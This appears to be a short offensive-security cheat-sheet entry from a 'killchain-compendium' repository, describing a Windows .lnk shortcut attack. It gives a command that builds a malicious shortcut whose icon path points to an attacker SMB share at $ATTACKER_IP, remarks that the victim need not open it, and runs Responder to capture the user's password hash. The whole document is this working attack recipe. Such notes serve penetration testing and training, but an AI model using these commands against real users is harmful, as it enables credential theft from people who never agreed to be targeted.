killchain-compendium/exploit/windows/docs/lnk_exploit.md

.lnk exploit

• Trendmicro's article

• mamachine's tool

• Target does not even have to open the link directly

mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk

• Start a responder and wait for user's hash

responder -I eth0